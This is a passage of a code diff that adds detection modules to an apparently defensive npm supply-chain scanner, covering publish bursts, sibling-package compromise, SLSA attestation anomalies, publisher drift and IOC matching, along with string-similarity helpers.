const maxPrefix = Math.min(4, len1, len2);
|
|
38
|
+
for (let i = 0; i < maxPrefix; i++) {
|
|
39
|
+
if (s1[i] === s2[i]) prefix++;
|
|
40
|
+
else break;
|
|
41
|
+
}
|
|
42
|
+
|
|
43
|
+
return jaro + prefix * 0.1 * (1 - jaro);
|
|
44
|
+
}
|
|
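To see how the 0.82 threshold used by `findClosestOrg` behaves, the Jaro-Winkler hunk above can be run against a look-alike org name. This is a sketch under stated assumptions: the function body is a compact restatement of the hunk, `KNOWN_ORGS` is a hypothetical three-entry list (the contents of `known-orgs.js` are not shown in this diff), and `closestOrg` is an illustrative name.

```javascript
// Compact restatement of the jaroWinkler() hunk above, so the sketch runs on its own.
function jaroWinkler(s1, s2) {
  if (s1 === s2) return 1;
  if (!s1.length || !s2.length) return 0;
  const dist = Math.floor(Math.max(s1.length, s2.length) / 2) - 1;
  const m1 = new Array(s1.length).fill(false);
  const m2 = new Array(s2.length).fill(false);
  let matches = 0;
  for (let i = 0; i < s1.length; i++) {
    const end = Math.min(s2.length, i + dist + 1);
    for (let j = Math.max(0, i - dist); j < end; j++) {
      if (m2[j] || s1[i] !== s2[j]) continue;
      m1[i] = m2[j] = true;
      matches++;
      break;
    }
  }
  if (matches === 0) return 0;
  let transpositions = 0;
  let k = 0;
  for (let i = 0; i < s1.length; i++) {
    if (!m1[i]) continue;
    while (!m2[k]) k++;
    if (s1[i] !== s2[k]) transpositions++;
    k++;
  }
  const jaro = (matches / s1.length + matches / s2.length
    + (matches - transpositions / 2) / matches) / 3;
  // Winkler bonus: up to four matching leading characters.
  let prefix = 0;
  while (prefix < Math.min(4, s1.length, s2.length) && s1[prefix] === s2[prefix]) prefix++;
  return jaro + prefix * 0.1 * (1 - jaro);
}

// Hypothetical allow-list; the real known-orgs.js contents are not shown in this diff.
const KNOWN_ORGS = ['openai', 'google', 'meta-llama'];

// Illustrative counterpart of findClosestOrg() with the same 0.82 cut-off.
function closestOrg(candidate, threshold = 0.82) {
  let best = { org: null, score: 0 };
  for (const known of KNOWN_ORGS) {
    const score = jaroWinkler(candidate.toLowerCase(), known);
    if (score >= threshold && score > best.score) best = { org: known, score };
  }
  return best;
}

console.log(closestOrg('0penai')); // org: 'openai', score ≈ 0.889
console.log(closestOrg('lodash')); // { org: null, score: 0 }
```

In this example `0penai` gets no Winkler prefix bonus because the substitution is in the first character, yet five of six characters still match in order, which is enough to clear the threshold.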
@@ -0,0 +1,46 @@
|
|
|
1
|
+
function hashToken(str) {
|
|
2
|
+
let hash = 5381;
|
|
3
|
+
for (let i = 0; i < str.length; i++) {
|
|
4
|
+
hash = ((hash << 5) + hash) + str.charCodeAt(i);
|
|
5
|
+
hash = hash & hash;
|
|
6
|
+
}
|
|
7
|
+
return hash >>> 0;
|
|
8
|
+
}
|
|
9
|
+
|
|
10
|
+
export function simhash(text) {
|
|
11
|
+
const v = new Array(64).fill(0);
|
|
12
|
+
const tokens = text.toLowerCase().split(/\s+/).filter(Boolean);
|
|
13
|
+
|
|
14
|
+
for (const token of tokens) {
|
|
15
|
+
const h = hashToken(token);
|
|
16
|
+
for (let i = 0; i < 64; i++) {
|
|
17
|
+
if ((h >> i) & 1) {
|
|
18
|
+
v[i] += 1;
|
|
19
|
+
} else {
|
|
20
|
+
v[i] -= 1;
|
|
21
|
+
}
|
|
22
|
+
}
|
|
23
|
+
}
|
|
24
|
+
|
|
25
|
+
let fingerprint = 0n;
|
|
26
|
+
for (let i = 0; i < 64; i++) {
|
|
27
|
+
if (v[i] > 0) {
|
|
28
|
+
fingerprint |= (1n << BigInt(i));
|
|
29
|
+
}
|
|
30
|
+
}
|
|
31
|
+
return fingerprint;
|
|
32
|
+
}
|
|
33
|
+
|
|
34
|
+
export function hammingDistance(a, b) {
|
|
35
|
+
let xor = a ^ b;
|
|
36
|
+
let count = 0;
|
|
37
|
+
while (xor > 0n) {
|
|
38
|
+
count += Number(xor & 1n);
|
|
39
|
+
xor >>= 1n;
|
|
40
|
+
}
|
|
41
|
+
return count;
|
|
42
|
+
}
|
|
43
|
+
|
|
44
|
+
export function similarity(a, b) {
|
|
45
|
+
return 1 - hammingDistance(a, b) / 64;
|
|
46
|
+
}
|
|
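One detail worth checking when reading the SimHash hunk above: `hashToken` returns a 32-bit value, and JavaScript's `>>` operator uses only the low five bits of its shift count, so `h >> 32` behaves like `h >> 0`. As a result, bits 32 to 63 of the fingerprint repeat bits 0 to 31. The sketch below restates the hunk's logic compactly to demonstrate this; it is an illustration with a made-up input string, not a proposed patch.

```javascript
// Compact restatement of the hashToken() and simhash() hunk above.
function hashToken(str) {
  let hash = 5381;
  for (let i = 0; i < str.length; i++) {
    hash = ((hash << 5) + hash) + str.charCodeAt(i);
    hash = hash & hash; // coerces the running value to a signed 32-bit integer
  }
  return hash >>> 0;
}

function simhash(text) {
  const v = new Array(64).fill(0);
  for (const token of text.toLowerCase().split(/\s+/).filter(Boolean)) {
    const h = hashToken(token);
    // For i >= 32 the shift count wraps, so this reads bit (i - 32) again.
    for (let i = 0; i < 64; i++) v[i] += (h >> i) & 1 ? 1 : -1;
  }
  let fingerprint = 0n;
  for (let i = 0; i < 64; i++) if (v[i] > 0) fingerprint |= 1n << BigInt(i);
  return fingerprint;
}

const fp = simhash('GPT-2 is a transformers model pretrained on English text');
const lowHalf = fp & 0xFFFFFFFFn;
const highHalf = fp >> 32n;
console.log(lowHalf === highHalf); // true: the upper half mirrors the lower half
```

The similarity ratio is unaffected, since the Hamming distance doubles along with the bit count, but the fingerprint effectively carries 32 bits of information rather than 64.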
@@ -10,6 +10,8 @@ import * as atk009 from './atk-009-dormant-trigger.js';
|
|
|
10
10
|
import * as atk010 from './atk-010-sandbox-evasion.js';
|
|
11
11
|
import * as atk011 from './atk-011-transitive-prop.js';
|
|
12
12
|
import { scanAll as megalodonScan } from './megalodon/index.js';
|
|
13
|
+
import { scan as hfScan } from './hf-impersonation/index.js';
|
|
14
|
+
import { scan as miniShaiHuludScan } from './mini-shai-hulud/index.js';
|
|
13
15
|
|
|
14
16
|
export async function runAll(pkgJson, files = [], registryMeta = null, allFiles = null) {
|
|
15
17
|
const findings = [];
|
|
@@ -25,5 +27,7 @@ export async function runAll(pkgJson, files = [], registryMeta = null, allFiles
|
|
|
25
27
|
findings.push(...await atk010.scan(pkgJson, files));
|
|
26
28
|
findings.push(...await atk011.scan(pkgJson, files));
|
|
27
29
|
findings.push(...await megalodonScan(pkgJson, allFiles || files, registryMeta));
|
|
30
|
+
findings.push(...await hfScan(pkgJson, files, registryMeta, allFiles || files));
|
|
31
|
+
findings.push(...await miniShaiHuludScan(pkgJson, files, registryMeta, allFiles || files));
|
|
28
32
|
return findings.sort((a, b) => b.severity.localeCompare(a.severity));
|
|
29
33
|
}
|
|
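Note that `runAll` orders findings with `b.severity.localeCompare(a.severity)`, which compares the severity labels as strings, so the result is reverse-alphabetical rather than ranked by severity. If rank order is what is intended, a comparator over an explicit rank map is one option. The sketch below assumes the label set from `SEVERITY_SCORE` in the HF impersonation hunk; `SEVERITY_RANK`, `bySeverityDesc`, and the sample findings are hypothetical.

```javascript
// Assumed label set, mirroring SEVERITY_SCORE from the HF impersonation hunk.
const SEVERITY_RANK = { none: 0, low: 1, medium: 2, high: 3, critical: 4 };

// Hypothetical comparator: most severe first, unknown labels last.
function bySeverityDesc(a, b) {
  return (SEVERITY_RANK[b.severity] ?? 0) - (SEVERITY_RANK[a.severity] ?? 0);
}

// Made-up findings for illustration.
const sampleFindings = [
  { id: 'A', severity: 'high' },
  { id: 'B', severity: 'critical' },
  { id: 'C', severity: 'medium' },
  { id: 'D', severity: 'low' },
];

// The comparator used in runAll(): string comparison of the labels.
const lexicalOrder = [...sampleFindings]
  .sort((a, b) => b.severity.localeCompare(a.severity))
  .map(f => f.severity);

const rankedOrder = [...sampleFindings].sort(bySeverityDesc).map(f => f.severity);

console.log(lexicalOrder); // [ 'medium', 'low', 'high', 'critical' ]
console.log(rankedOrder);  // [ 'critical', 'high', 'medium', 'low' ]
```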
@@ -0,0 +1,42 @@
|
|
|
1
|
+
export async function checkBurstPublish(registryMeta, config = {}) {
|
|
2
|
+
const windowMinutes = config.burstWindowMinutes ?? 30;
|
|
3
|
+
const threshold = config.burstVersionThreshold ?? 3;
|
|
4
|
+
|
|
5
|
+
const times = registryMeta?.time || {};
|
|
6
|
+
const entries = Object.entries(times)
|
|
7
|
+
.filter(([v]) => v !== 'created' && v !== 'modified')
|
|
8
|
+
.filter(([, t]) => t)
|
|
9
|
+
.map(([v, t]) => [v, new Date(t).getTime()])
|
|
10
|
+
.filter(([, ts]) => !Number.isNaN(ts))
|
|
11
|
+
.sort((a, b) => a[1] - b[1]);
|
|
12
|
+
|
|
13
|
+
if (entries.length === 0) return { triggered: false };
|
|
14
|
+
|
|
15
|
+
const windowMs = windowMinutes * 60 * 1000;
|
|
16
|
+
|
|
17
|
+
for (let i = 0; i < entries.length; i++) {
|
|
18
|
+
const windowStart = entries[i][1];
|
|
19
|
+
const windowEnd = windowStart + windowMs;
|
|
20
|
+
const inWindow = [];
|
|
21
|
+
|
|
22
|
+
for (let j = i; j < entries.length; j++) {
|
|
23
|
+
if (entries[j][1] <= windowEnd) {
|
|
24
|
+
inWindow.push(entries[j][0]);
|
|
25
|
+
} else {
|
|
26
|
+
break;
|
|
27
|
+
}
|
|
28
|
+
}
|
|
29
|
+
|
|
30
|
+
if (inWindow.length >= threshold) {
|
|
31
|
+
return {
|
|
32
|
+
triggered: true,
|
|
33
|
+
windowStart: new Date(windowStart).toISOString(),
|
|
34
|
+
windowEnd: new Date(windowEnd).toISOString(),
|
|
35
|
+
versionCount: inWindow.length,
|
|
36
|
+
versions: inWindow,
|
|
37
|
+
};
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
return { triggered: false };
|
|
42
|
+
}
|
|
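The burst check above slides a fixed window forward from each publish timestamp and fires when at least `burstVersionThreshold` versions fall inside it. The following synchronous sketch restates that logic so it can be run directly. `findBurst` is a hypothetical name, and the `time` map is made-up sample data shaped like the `time` field of npm registry metadata.

```javascript
// Synchronous sketch of the sliding-window check; findBurst is a hypothetical name.
function findBurst(timeMap, windowMinutes = 30, threshold = 3) {
  const entries = Object.entries(timeMap)
    .filter(([v, t]) => v !== 'created' && v !== 'modified' && t)
    .map(([v, t]) => [v, new Date(t).getTime()])
    .filter(([, ts]) => !Number.isNaN(ts))
    .sort((a, b) => a[1] - b[1]);

  const windowMs = windowMinutes * 60 * 1000;
  for (let i = 0; i < entries.length; i++) {
    const windowEnd = entries[i][1] + windowMs;
    const versions = [];
    // Entries are sorted, so stop at the first publish past the window.
    for (let j = i; j < entries.length && entries[j][1] <= windowEnd; j++) {
      versions.push(entries[j][0]);
    }
    if (versions.length >= threshold) {
      return {
        triggered: true,
        windowStart: new Date(entries[i][1]).toISOString(),
        versions,
      };
    }
  }
  return { triggered: false };
}

// Made-up sample: one old release, then three releases within 20 minutes.
const sampleTime = {
  created: '2026-01-01T00:00:00.000Z',
  modified: '2026-03-01T10:20:00.000Z',
  '1.0.0': '2026-01-01T00:00:00.000Z',
  '1.0.1': '2026-03-01T10:00:00.000Z',
  '1.0.2': '2026-03-01T10:10:00.000Z',
  '1.0.3': '2026-03-01T10:20:00.000Z',
};

const burst = findBurst(sampleTime);
console.log(burst.triggered, burst.versions); // true [ '1.0.1', '1.0.2', '1.0.3' ]
```

With the defaults shown in the hunk (30 minutes, 3 versions), a fast but legitimate patch series would also trigger, which is presumably why both values are configurable.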
@@ -0,0 +1,116 @@
|
|
|
1
|
+
const siblingCache = new Map();
|
|
2
|
+
|
|
3
|
+
export function clearSiblingCache() {
|
|
4
|
+
siblingCache.clear();
|
|
5
|
+
}
|
|
6
|
+
|
|
7
|
+
function checkBurstOnTimeMap(timeMap, windowMinutes, threshold) {
|
|
8
|
+
const entries = Object.entries(timeMap)
|
|
9
|
+
.filter(([v]) => v !== 'created' && v !== 'modified')
|
|
10
|
+
.filter(([, t]) => t)
|
|
11
|
+
.map(([v, t]) => [v, new Date(t).getTime()])
|
|
12
|
+
.filter(([, ts]) => !Number.isNaN(ts))
|
|
13
|
+
.sort((a, b) => a[1] - b[1]);
|
|
14
|
+
|
|
15
|
+
if (entries.length === 0) return null;
|
|
16
|
+
|
|
17
|
+
const windowMs = windowMinutes * 60 * 1000;
|
|
18
|
+
|
|
19
|
+
for (let i = 0; i < entries.length; i++) {
|
|
20
|
+
const wStart = entries[i][1];
|
|
21
|
+
const wEnd = wStart + windowMs;
|
|
22
|
+
const inWindow = [];
|
|
23
|
+
|
|
24
|
+
for (let j = i; j < entries.length; j++) {
|
|
25
|
+
if (entries[j][1] <= wEnd) {
|
|
26
|
+
inWindow.push(entries[j][0]);
|
|
27
|
+
} else {
|
|
28
|
+
break;
|
|
29
|
+
}
|
|
30
|
+
}
|
|
31
|
+
|
|
32
|
+
if (inWindow.length >= threshold) {
|
|
33
|
+
return {
|
|
34
|
+
windowStart: new Date(wStart).toISOString(),
|
|
35
|
+
windowEnd: new Date(wEnd).toISOString(),
|
|
36
|
+
versionCount: inWindow.length,
|
|
37
|
+
};
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
return null;
|
|
42
|
+
}
|
|
43
|
+
|
|
44
|
+
export async function checkSiblingCompromise(pkgJson, config = {}) {
|
|
45
|
+
const windowMinutes = config.burstWindowMinutes ?? 30;
|
|
46
|
+
const threshold = config.burstVersionThreshold ?? 3;
|
|
47
|
+
|
|
48
|
+
const deps = {
|
|
49
|
+
...pkgJson.dependencies,
|
|
50
|
+
...pkgJson.devDependencies,
|
|
51
|
+
...pkgJson.peerDependencies,
|
|
52
|
+
};
|
|
53
|
+
|
|
54
|
+
const scopedDeps = {};
|
|
55
|
+
for (const name of Object.keys(deps)) {
|
|
56
|
+
if (name.startsWith('@')) {
|
|
57
|
+
const scope = name.split('/')[0];
|
|
58
|
+
if (!scopedDeps[scope]) scopedDeps[scope] = [];
|
|
59
|
+
scopedDeps[scope].push(name);
|
|
60
|
+
}
|
|
61
|
+
}
|
|
62
|
+
|
|
63
|
+
if (Object.keys(scopedDeps).length === 0) return { triggered: false };
|
|
64
|
+
|
|
65
|
+
const results = [];
|
|
66
|
+
|
|
67
|
+
for (const [scope, packages] of Object.entries(scopedDeps)) {
|
|
68
|
+
if (packages.length < 2) continue;
|
|
69
|
+
|
|
70
|
+
const burstSiblings = [];
|
|
71
|
+
|
|
72
|
+
for (const pkg of packages) {
|
|
73
|
+
let timeData = siblingCache.get(pkg);
|
|
74
|
+
if (!timeData) {
|
|
75
|
+
try {
|
|
76
|
+
const url = `https://registry.npmjs.org/${encodeURIComponent(pkg)}`;
|
|
77
|
+
const res = await fetch(url);
|
|
78
|
+
if (!res.ok) continue;
|
|
79
|
+
const data = await res.json();
|
|
80
|
+
timeData = data.time || {};
|
|
81
|
+
siblingCache.set(pkg, timeData);
|
|
82
|
+
} catch {
|
|
83
|
+
continue;
|
|
84
|
+
}
|
|
85
|
+
}
|
|
86
|
+
|
|
87
|
+
const burstInfo = checkBurstOnTimeMap(timeData, windowMinutes, threshold);
|
|
88
|
+
if (burstInfo) {
|
|
89
|
+
burstSiblings.push({ name: pkg, ...burstInfo });
|
|
90
|
+
}
|
|
91
|
+
}
|
|
92
|
+
|
|
93
|
+
if (burstSiblings.length >= 2) {
|
|
94
|
+
const windows = burstSiblings.map(s => ({
|
|
95
|
+
start: new Date(s.windowStart).getTime(),
|
|
96
|
+
end: new Date(s.windowEnd).getTime(),
|
|
97
|
+
}));
|
|
98
|
+
|
|
99
|
+
const overlapStart = Math.max(...windows.map(w => w.start));
|
|
100
|
+
const overlapEnd = Math.min(...windows.map(w => w.end));
|
|
101
|
+
|
|
102
|
+
if (overlapStart < overlapEnd) {
|
|
103
|
+
results.push({
|
|
104
|
+
triggered: true,
|
|
105
|
+
scope,
|
|
106
|
+
siblingPackages: burstSiblings.map(s => s.name),
|
|
107
|
+
windowStart: new Date(overlapStart).toISOString(),
|
|
108
|
+
windowEnd: new Date(overlapEnd).toISOString(),
|
|
109
|
+
});
|
|
110
|
+
}
|
|
111
|
+
}
|
|
112
|
+
}
|
|
113
|
+
|
|
114
|
+
if (results.length === 0) return { triggered: false };
|
|
115
|
+
return { triggered: true, results };
|
|
116
|
+
}
|
|
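The sibling check in this file combines two steps: a sliding-window scan over each package's publish times, then an intersection test across the windows it finds. The sketch below restates both as standalone functions. `findBurst` and `windowsOverlap` are hypothetical names, and the sketch assumes `entries` are `[version, epochMs]` pairs already sorted by time; the start of `checkBurstOnTimeMap` is not visible in this hunk, so that sorting is an assumption rather than something the diff confirms.

```javascript
// Hypothetical helper: returns the first window of `windowMs` containing at
// least `threshold` publishes, or null. Assumes `entries` is sorted by time.
function findBurst(entries, windowMs, threshold) {
  for (let i = 0; i < entries.length; i++) {
    const start = entries[i][1];
    const end = start + windowMs;
    let count = 0;
    for (let j = i; j < entries.length && entries[j][1] <= end; j++) count++;
    if (count >= threshold) return { start, end, versionCount: count };
  }
  return null;
}

// Hypothetical helper: a set of windows shares a common interval only if the
// latest start comes before the earliest end.
function windowsOverlap(windows) {
  const latestStart = Math.max(...windows.map(w => w.start));
  const earliestEnd = Math.min(...windows.map(w => w.end));
  return latestStart < earliestEnd
    ? { start: latestStart, end: earliestEnd }
    : null;
}

// Invented timestamps (minutes converted to ms), for illustration only.
const MIN = 60 * 1000;
const pkgA = [['1.0.0', 0], ['1.0.1', 2 * MIN], ['1.0.2', 5 * MIN]];
const pkgB = [['2.0.0', 10 * MIN], ['2.0.1', 11 * MIN], ['2.0.2', 12 * MIN]];

const burstA = findBurst(pkgA, 30 * MIN, 3);
const burstB = findBurst(pkgB, 30 * MIN, 3);
const shared = windowsOverlap([burstA, burstB]);
console.log(shared);
```

Because each reported window spans the full `windowMs` from its first publish, two bursts that start less than one window apart will always intersect, regardless of how tightly the publishes inside each burst are clustered.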
@@ -0,0 +1,72 @@
|
|
|
1
|
+
export async function checkSlsaMismatch(packageName, version, burstWindow, timeMap = {}, config = {}) {
|
|
2
|
+
if (!burstWindow?.triggered) return { triggered: false };
|
|
3
|
+
|
|
4
|
+
const anomalies = [];
|
|
5
|
+
const publishTime = timeMap?.[version];
|
|
6
|
+
if (!publishTime) return { triggered: false };
|
|
7
|
+
|
|
8
|
+
try {
|
|
9
|
+
const url = `https://registry.npmjs.org/-/npm/v1/attestations/${encodeURIComponent(packageName)}/${encodeURIComponent(version)}`;
|
|
10
|
+
const res = await fetch(url);
|
|
11
|
+
if (!res.ok) return { triggered: false };
|
|
12
|
+
|
|
13
|
+
const data = await res.json();
|
|
14
|
+
const attestations = data?.attestations || [];
|
|
15
|
+
if (attestations.length === 0) return { triggered: false };
|
|
16
|
+
|
|
17
|
+
const publishMs = new Date(publishTime).getTime();
|
|
18
|
+
if (Number.isNaN(publishMs)) return { triggered: false };
|
|
19
|
+
|
|
20
|
+
// Check if this is the first-ever attested version for this package
|
|
21
|
+
const allVersions = Object.keys(timeMap).filter(v => v !== 'created' && v !== 'modified');
|
|
22
|
+
const currentIdx = allVersions.indexOf(version);
|
|
23
|
+
let prevHadAttestation = false;
|
|
24
|
+
|
|
25
|
+
if (currentIdx > 0) {
|
|
26
|
+
const priorVersions = allVersions.slice(0, currentIdx).slice(-2);
|
|
27
|
+
for (const pv of priorVersions) {
|
|
28
|
+
try {
|
|
29
|
+
const purl = `https://registry.npmjs.org/-/npm/v1/attestations/${encodeURIComponent(packageName)}/${encodeURIComponent(pv)}`;
|
|
30
|
+
const pres = await fetch(purl);
|
|
31
|
+
if (pres.ok) {
|
|
32
|
+
const pdata = await pres.json();
|
|
33
|
+
if (pdata?.attestations?.length > 0) {
|
|
34
|
+
prevHadAttestation = true;
|
|
35
|
+
break;
|
|
36
|
+
}
|
|
37
|
+
}
|
|
38
|
+
} catch {
|
|
39
|
+
// skip prior version check
|
|
40
|
+
}
|
|
41
|
+
}
|
|
42
|
+
|
|
43
|
+
if (!prevHadAttestation && priorVersions.length > 0) {
|
|
44
|
+
anomalies.push(`First-ever SLSA attestation for ${packageName}, published in burst window`);
|
|
45
|
+
}
|
|
46
|
+
}
|
|
47
|
+
|
|
48
|
+
for (const att of attestations) {
|
|
49
|
+
const ts = att?.timestamp;
|
|
50
|
+
if (ts) {
|
|
51
|
+
const attMs = new Date(ts).getTime();
|
|
52
|
+
if (!Number.isNaN(attMs) && attMs >= publishMs && (attMs - publishMs) < 60000) {
|
|
53
|
+
const gapMs = attMs - publishMs;
|
|
54
|
+
anomalies.push(`Sub-60s attestation gap for ${version}: ${gapMs}ms`);
|
|
55
|
+
}
|
|
56
|
+
}
|
|
57
|
+
|
|
58
|
+
const builderId = att?.predicate?.runDetails?.builder?.id;
|
|
59
|
+
if (builderId) {
|
|
60
|
+
const knownPrefixes = ['https://github.com/', 'https://gitlab.com/', 'https://circleci.com/'];
|
|
61
|
+
const isKnown = knownPrefixes.some(p => builderId.startsWith(p));
|
|
62
|
+
if (!isKnown) {
|
|
63
|
+
anomalies.push(`Unrecognized builder ID for ${version}: ${builderId}`);
|
|
64
|
+
}
|
|
65
|
+
}
|
|
66
|
+
}
|
|
67
|
+
} catch {
|
|
68
|
+
return { triggered: false };
|
|
69
|
+
}
|
|
70
|
+
|
|
71
|
+
return { triggered: anomalies.length > 0, anomalies };
|
|
72
|
+
}
|
|
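The per-attestation loop in this file applies two independent rules: a publish-to-attestation gap under 60 seconds, and a builder ID that does not start with a known CI prefix. A minimal pure-function sketch of those two rules follows. `attestationAnomalies` is a hypothetical name, the sample attestation is invented, and the field paths (`timestamp`, `predicate.runDetails.builder.id`) are copied from the diff; whether the registry response exposes them at exactly those paths is not verified here.

```javascript
// Prefix list copied from the diff.
const KNOWN_BUILDER_PREFIXES = [
  'https://github.com/',
  'https://gitlab.com/',
  'https://circleci.com/',
];

// Hypothetical helper mirroring the two per-attestation checks.
function attestationAnomalies(att, publishMs, version) {
  const anomalies = [];

  // Rule 1: attestation timestamp within 60 s after the publish time.
  const attMs = att?.timestamp ? new Date(att.timestamp).getTime() : NaN;
  const gapMs = attMs - publishMs;
  if (!Number.isNaN(attMs) && gapMs >= 0 && gapMs < 60000) {
    anomalies.push(`Sub-60s attestation gap for ${version}: ${gapMs}ms`);
  }

  // Rule 2: builder ID outside the known CI prefixes.
  const builderId = att?.predicate?.runDetails?.builder?.id;
  if (builderId && !KNOWN_BUILDER_PREFIXES.some(p => builderId.startsWith(p))) {
    anomalies.push(`Unrecognized builder ID for ${version}: ${builderId}`);
  }
  return anomalies;
}

// Invented sample data.
const publishMs = Date.parse('2026-05-15T12:00:00.000Z');
const sample = {
  timestamp: '2026-05-15T12:00:20.000Z',
  predicate: { runDetails: { builder: { id: 'https://builds.example.test/runner' } } },
};
const found = attestationAnomalies(sample, publishMs, '1.2.3');
console.log(found);
```

Keeping the rules in a pure function like this would make them testable without network access; the version in the diff interleaves them with `fetch` calls.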
@@ -0,0 +1,45 @@
|
|
|
1
|
+
export async function checkMaintainerAnomaly(registryMeta, config = {}) {
|
|
2
|
+
const versions = registryMeta?.versions || {};
|
|
3
|
+
const timeMap = registryMeta?.time || {};
|
|
4
|
+
|
|
5
|
+
const sorted = Object.entries(timeMap)
|
|
6
|
+
.filter(([v]) => v !== 'created' && v !== 'modified')
|
|
7
|
+
.filter(([, t]) => t)
|
|
8
|
+
.map(([v, t]) => ({
|
|
9
|
+
version: v,
|
|
10
|
+
time: new Date(t).getTime(),
|
|
11
|
+
user: versions[v]?._npmUser?.name,
|
|
12
|
+
}))
|
|
13
|
+
.filter(e => !Number.isNaN(e.time) && e.user)
|
|
14
|
+
.sort((a, b) => a.time - b.time);
|
|
15
|
+
|
|
16
|
+
if (sorted.length < 2) return { triggered: false };
|
|
17
|
+
|
|
18
|
+
for (let i = 1; i < sorted.length; i++) {
|
|
19
|
+
const prev = sorted[i - 1];
|
|
20
|
+
const curr = sorted[i];
|
|
21
|
+
|
|
22
|
+
if (curr.user !== prev.user) {
|
|
23
|
+
const gapMinutes = (curr.time - prev.time) / (1000 * 60);
|
|
24
|
+
if (gapMinutes <= 10) {
|
|
25
|
+
const newUserVersions = sorted.filter(e => e.user === curr.user);
|
|
26
|
+
if (newUserVersions.length >= 2) {
|
|
27
|
+
return {
|
|
28
|
+
triggered: true,
|
|
29
|
+
signals: [{
|
|
30
|
+
type: 'PUBLISHER_DRIFT_RAPID',
|
|
31
|
+
previousPublisher: prev.user,
|
|
32
|
+
newPublisher: curr.user,
|
|
33
|
+
gapMinutes,
|
|
34
|
+
newUserVersionCount: newUserVersions.length,
|
|
35
|
+
driftVersion: curr.version,
|
|
36
|
+
driftWindowStart: new Date(curr.time).toISOString(),
|
|
37
|
+
}],
|
|
38
|
+
};
|
|
39
|
+
}
|
|
40
|
+
}
|
|
41
|
+
}
|
|
42
|
+
}
|
|
43
|
+
|
|
44
|
+
return { triggered: false };
|
|
45
|
+
}
|
|
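The publisher-drift rule in this file can be exercised without the registry by feeding it a hand-built metadata object. The sketch below is a synchronous restatement of that rule under the same thresholds. `findRapidPublisherDrift` is a hypothetical name and the `meta` object, including the account names, is invented for illustration.

```javascript
// Hypothetical synchronous restatement of the drift rule from the diff.
function findRapidPublisherDrift(registryMeta, maxGapMinutes = 10) {
  const versions = registryMeta?.versions || {};
  const sorted = Object.entries(registryMeta?.time || {})
    .filter(([v, t]) => v !== 'created' && v !== 'modified' && t)
    .map(([v, t]) => ({
      version: v,
      time: new Date(t).getTime(),
      user: versions[v]?._npmUser?.name,
    }))
    .filter(e => !Number.isNaN(e.time) && e.user)
    .sort((a, b) => a.time - b.time);

  for (let i = 1; i < sorted.length; i++) {
    const prev = sorted[i - 1];
    const curr = sorted[i];
    if (curr.user === prev.user) continue;
    const gapMinutes = (curr.time - prev.time) / 60000;
    // Counts every version by the new publisher, not only those in the window.
    const byNewUser = sorted.filter(e => e.user === curr.user).length;
    if (gapMinutes <= maxGapMinutes && byNewUser >= 2) {
      return {
        previousPublisher: prev.user,
        newPublisher: curr.user,
        gapMinutes,
        driftVersion: curr.version,
      };
    }
  }
  return null;
}

// Invented metadata: the publisher changes four minutes after 1.0.0.
const meta = {
  time: {
    created: '2026-01-01T00:00:00.000Z',
    '1.0.0': '2026-05-01T10:00:00.000Z',
    '1.0.1': '2026-05-01T10:04:00.000Z',
    '1.0.2': '2026-05-01T10:05:00.000Z',
  },
  versions: {
    '1.0.0': { _npmUser: { name: 'alice' } },
    '1.0.1': { _npmUser: { name: 'mallory' } },
    '1.0.2': { _npmUser: { name: 'mallory' } },
  },
};
const drift = findRapidPublisherDrift(meta);
console.log(drift);
```

One consequence of counting the new publisher's versions across the whole history: two long-standing co-maintainers who publish within ten minutes of each other would also satisfy the rule, so a consumer may want to treat this signal as supporting evidence rather than conclusive.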
@@ -0,0 +1,95 @@
|
|
|
1
|
+
import { readFileSync } from 'fs';
|
|
2
|
+
import { fileURLToPath } from 'url';
|
|
3
|
+
import { dirname, join } from 'path';
|
|
4
|
+
|
|
5
|
+
let iocsData = null;
|
|
6
|
+
let iocsLoaded = false;
|
|
7
|
+
let iocLoadError = null;
|
|
8
|
+
|
|
9
|
+
const __filename = fileURLToPath(import.meta.url);
|
|
10
|
+
const __dirname = dirname(__filename);
|
|
11
|
+
const IOC_PATH = join(__dirname, 'iocs.json');
|
|
12
|
+
|
|
13
|
+
function loadIOCData() {
|
|
14
|
+
if (iocsLoaded) return iocsData;
|
|
15
|
+
iocsLoaded = true;
|
|
16
|
+
try {
|
|
17
|
+
iocsData = JSON.parse(readFileSync(IOC_PATH, 'utf8'));
|
|
18
|
+
} catch (err) {
|
|
19
|
+
iocLoadError = err;
|
|
20
|
+
iocsData = null;
|
|
21
|
+
}
|
|
22
|
+
return iocsData;
|
|
23
|
+
}
|
|
24
|
+
|
|
25
|
+
export function getIOCLoadError() {
|
|
26
|
+
return iocLoadError;
|
|
27
|
+
}
|
|
28
|
+
|
|
29
|
+
export function reloadIOCData() {
|
|
30
|
+
iocsLoaded = false;
|
|
31
|
+
iocLoadError = null;
|
|
32
|
+
return loadIOCData();
|
|
33
|
+
}
|
|
34
|
+
|
|
35
|
+
export async function checkIOC(pkgName, pkgVersion, sha512, publisherAccount, timeMap = {}) {
|
|
36
|
+
const data = loadIOCData();
|
|
37
|
+
if (!data) return { triggered: false, matches: [] };
|
|
38
|
+
|
|
39
|
+
const matches = [];
|
|
40
|
+
const allIOCs = [];
|
|
41
|
+
|
|
42
|
+
allIOCs.push(...(data.iocs || []));
|
|
43
|
+
|
|
44
|
+
for (const waveKey of Object.keys(data.waves || {})) {
|
|
45
|
+
const wave = data.waves[waveKey];
|
|
46
|
+
const waveNum = waveKey === 'wave1' ? 1 : 2;
|
|
47
|
+
for (const ioc of (wave.iocs || [])) {
|
|
48
|
+
allIOCs.push({ ...ioc, wave: waveNum });
|
|
49
|
+
}
|
|
50
|
+
}
|
|
51
|
+
|
|
52
|
+
for (const ioc of allIOCs) {
|
|
53
|
+
switch (ioc.type) {
|
|
54
|
+
case 'packageName': {
|
|
55
|
+
if (ioc.value === pkgName) {
|
|
56
|
+
if (!ioc.maliciousVersions || ioc.maliciousVersions.length === 0 || ioc.maliciousVersions.includes(pkgVersion)) {
|
|
57
|
+
matches.push({ type: 'packageName', value: pkgName, wave: ioc.wave });
|
|
58
|
+
}
|
|
59
|
+
}
|
|
60
|
+
break;
|
|
61
|
+
}
|
|
62
|
+
|
|
63
|
+
case 'packageScope': {
|
|
64
|
+
if (pkgName.startsWith(ioc.value)) {
|
|
65
|
+
matches.push({ type: 'packageScope', value: ioc.value, wave: ioc.wave });
|
|
66
|
+
}
|
|
67
|
+
break;
|
|
68
|
+
}
|
|
69
|
+
|
|
70
|
